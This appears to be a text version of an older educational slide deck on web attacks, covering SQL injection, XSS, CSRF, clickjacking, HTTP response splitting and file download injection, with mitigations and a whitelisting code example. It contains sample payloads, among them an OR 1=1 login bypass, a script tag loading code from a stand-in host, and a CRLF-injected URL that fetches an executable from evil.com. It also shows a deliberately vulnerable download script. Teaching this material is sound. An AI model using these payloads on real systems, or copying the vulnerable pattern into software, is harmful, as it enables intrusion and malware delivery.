Trendy Web Security
A Review of times past
SQL Injection
Password field: ' OR 1=1; --
Parses as: SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1
And you're in...
Cross Site Scripting (XSS)
About-Me field: I enjoy long walks on the beach, and <script src="http://my-hacks.com/owned.js">
Now you have your code running in another guy's browser.
Have your code change his Linksys' DNS settings?
SQL Injections and XSS attacks are old news.
What's new(er)?
Click Jacking
A Demo...
No JS Needed!
Cross Site Request Forgery
You are now logged out of google.
Or... had your domain stolen
• CSRF Creates a new Gmail Filter which forwards certain emails
• Hacker sends an email forwarded to your host, asking for a transfer + unlock
• Hacker transfers your domain away.
HTTP Response Splitting
Normal request: /redir_lang.jsp?lang=English
Attack request: /redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam
What the server sends back (the injected CR/LF pairs split it into two responses):
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

Shazam
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
Content-Type: text/html
Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/
Connection: Close
What the browser sees as the first response:
302 Moved Temporarily. This document you requested has moved temporarily.
It's now at http://10.1.1.1/by_lang.jsp?lang=foobar (Content-Length: 0)
And as the second response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
Why?
• Cache poisoning
• Replace content
• Phishing
• XSS
• etc.
File Download Injection
A similar idea to response splitting.
We've all written download scripts: download.php?file=report.xls
<?php
// download.php as shown on the slide: the request argument is used both as the
// Content-Disposition file name and as the path handed to readfile().
// (The slide's URL calls the argument "file"; the code reads it as "download".)
$filename = basename($_GET["download"]);
header('Content-Disposition: attachment; filename="' . $filename . '"');
readfile(basename($_GET["download"]));
return;
http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe
The response, with the injected CR/LF pairs turned into line breaks:
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Path=/download
Content-Disposition: attachment;filename=attack.bat
Content-length: 88
echo get /pub/winzip/wzinet95.exe|ftp -A evil.com
awzinet95.exe
Content-Length: 0
Content-Type: application/octet-stream;charset=euc-kr
It's a dangerous world...
How about some Mitigation
As a user: Keep the sensitive stuff in a separate browser?
As a programmer: Whitelist everything. Nothing gets through without you knowing.
As a programmer: GET vs. POST. Use them correctly.
Download Injection: Use the real file name, not the HTTP argument.
ClickJacking: NoScript has a "Forbid iframe" feature.
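An added example (Python, not code from the slides) of the download-injection mitigation above: a header builder in the same shape as the slide's download.php beside a whitelisted version that only ever uses the request value as a lookup key. ALLOWED_DOWNLOADS, SAFE_KEY and the INJECTED payload string are constructed for the example.

```python
import re
from typing import Optional

# Constructed allow-list: public "file" argument -> real file name on disk.
# The request value is only a lookup key and is never echoed into a header,
# which is the slide's "use the real file name, not the HTTP argument".
ALLOWED_DOWNLOADS = {
    "report.xls": "report.xls",
    "q1-summary": "Q1 Summary 2008.pdf",
}

# fullmatch(), not match() with "$": "$" also matches before a trailing "\n",
# so "report.xls\n" would otherwise slip through the whitelist.
SAFE_KEY = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def vulnerable_download_headers(requested_name: str) -> bytes:
    """Same shape as the slide's download.php: the (already URL-decoded) argument
    is pasted straight into Content-Disposition, so CR/LF in it ends the headers."""
    return (
        "HTTP/1.1 200 OK\r\n"
        f'Content-Disposition: attachment; filename="{requested_name}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode("latin-1")


def safe_download_headers(requested_name: str) -> Optional[bytes]:
    """Hardened form: whitelist the key, look up the real name, refuse anything else."""
    if not SAFE_KEY.fullmatch(requested_name):
        return None                       # CR, LF, quotes and slashes stop here
    real_name = ALLOWED_DOWNLOADS.get(requested_name)
    if real_name is None or any(c in real_name for c in '\r\n"'):
        return None                       # unknown key, or a bad entry in our own table
    return (
        "HTTP/1.1 200 OK\r\n"
        f'Content-Disposition: attachment; filename="{real_name}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode("latin-1")


def header_blocks(raw: bytes) -> int:
    """How many header/body boundaries a client sees: one for a clean response,
    more for a split one (as on the response-splitting and download slides)."""
    return raw.count(b"\r\n\r\n")


def body_after_first_block(raw: bytes) -> bytes:
    """What the client treats as the downloaded file's content."""
    return raw.split(b"\r\n\r\n", 1)[1]


# Constructed payload in the style of the slide's URL, already %-decoded.
INJECTED = "attack.bat\r\n\r\necho injected-content\r\n"
```

With the vulnerable builder, header_blocks() reports 2 and the "file" the browser saves begins with the attacker's text; the safe builder returns None for the same input. Current PHP versions also refuse a header() value containing a newline, but that is a backstop, not a substitute for the whitelist.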
Links
• http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
• http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
• http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
• http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
• http://www.breakingpointsystems.com/community/blog/clickjacking
• http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.davidairey.com/google-gmail-security-hijack/
• http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html